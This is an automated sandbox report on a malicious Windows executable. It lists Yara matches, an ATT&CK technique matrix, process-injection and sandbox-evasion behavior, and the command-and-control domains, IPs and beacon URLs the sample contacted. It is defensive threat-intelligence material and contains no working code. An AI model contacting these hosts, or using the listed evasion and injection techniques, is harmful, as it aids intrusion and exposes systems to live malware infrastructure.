          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452473 Sample: NQBNpLezqZKv1P4.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 31 www.fbgroupsmadesimple.com 2->31 33 fbgroupsmadesimple.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 3 other signatures 2->47 11 NQBNpLezqZKv1P4.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...29QBNpLezqZKv1P4.exe.log, ASCII 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 NQBNpLezqZKv1P4.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.boicity.com 156.241.53.21, 49763, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->35 37 www.sh-zzjy.com 156.241.53.248, 49766, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->37 39 7 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Uses netstat to query active network connections and open ports 18->51 22 NETSTAT.EXE 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NQBNpLezqZKv1P4.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.zhongyicts.com.cnue0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/ct0%Avira URL Cloudsafe
          http://www.sandoll.co.krbl0%Avira URL Cloudsafe
          http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.goodfont.co.krklJ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnUc0%Avira URL Cloudsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.carterandcone.comen0%URL Reputationsafe
          http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          www.extraclass.xyz/4nn8/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.carterandcone.comroa0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.founder.com.cn/cnAc0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.tiro.comicFf0%Avira URL Cloudsafe
          http://www.carterandcone.comR0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr.kr0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://fontfabrik.comp0%Avira URL Cloudsafe
          http://www.sajatypeworks.coml0%Avira URL Cloudsafe
          http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.goodfont.co.krylx0%Avira URL Cloudsafe
          http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.tiro.comicwf0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP960%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://fontfabrik.com(0%Avira URL Cloudsafe
          http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo0%Avira URL Cloudsafe
          http://www.sandoll.co.kr8l0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com
          		46.137.146.55
          		truetrue
            		unknown
            iafzal.com
            		184.168.131.241
            		truetrue
              		unknown
              www.nirvananaturalcbd.net
              		104.143.9.211
              		truetrue
                		unknown
                www.boicity.com
                		156.241.53.21
                		truetrue
                  		unknown
                  www.zrcezzfdfkyjlir.com
                  		199.34.228.66
                  		truetrue
                    		unknown
                    fbgroupsmadesimple.com
                    		184.168.131.241
                    		truetrue
                      		unknown
                      www.sh-zzjy.com
                      		156.241.53.248
                      		truetrue
                        		unknown
                        www.fbgroupsmadesimple.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.iafzal.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.updates-app.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.extraclass.xyz/4nn8/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDotrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.zhongyicts.com.cnueNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/ctNQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sandoll.co.krblNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krklJNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnUcNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://api.twitter.com/1/direct_messages.xml?since_id=NQBNpLezqZKv1P4.exefalse
                                      		high
                                      http://www.carterandcone.comenNQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.carterandcone.comroaNQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://twitter.com/statuses/user_timeline.xml?screen_name=NQBNpLezqZKv1P4.exefalse
                                          		high
                                          http://www.carterandcone.comNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnAcNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.tiro.comicFfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comRNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.%s.comPAexplorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.sandoll.co.kr.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fonts.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.como.NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.compNQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comlNQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.goodfont.co.krylxNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.carterandcone.comTCNQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.tiro.comicwfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://050005.voodoo.com/js/partner.jsNETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.carterandcone.comlexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cn/NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-user.htmlNQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      		high
                                                      https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://fontfabrik.com(NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.sandoll.co.kr8lNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        156.241.53.248
                                                        		www.sh-zzjy.comSeychelles
                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                        46.137.146.55
                                                        		round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.comIreland
                                                        		16509AMAZON-02UStrue
                                                        104.143.9.211
                                                        		www.nirvananaturalcbd.netUnited States
                                                        		64200VIVIDHOSTINGUStrue
                                                        184.168.131.241
                                                        		iafzal.comUnited States
                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                        156.241.53.21
                                                        		www.boicity.comSeychelles
                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                        199.34.228.66
                                                        		www.zrcezzfdfkyjlir.comUnited States
                                                        		27647WEEBLYUStrue

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:452473
                                                        Start date:22.07.2021
                                                        Start time:13:13:10
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 10m 10s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:NQBNpLezqZKv1P4.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:17
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@7/1@7/6
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 24.1% (good quality ratio 21%)
                                                        • Quality average: 71.5%
                                                        • Quality standard deviation: 33.4%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 168.61.161.212, 20.50.102.62, 205.185.216.42, 205.185.216.10, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
                                                        • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        13:14:20API Interceptor1x Sleep call for process: NQBNpLezqZKv1P4.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        104.143.9.211Y-20211907-00927735_pdf.exeGet hashmaliciousBrowse
                                                        • www.daniellageorges.com/uisg/?tF=ML04lb7xhZYx&5j3p=hhyAeZMb3zFiy4MOM2D3s3kjgT3RuE2EuTgtPMYOyuC8t4VCBdMXjazi2AHJSH/wEcpc
                                                        184.168.131.241G1638.exeGet hashmaliciousBrowse
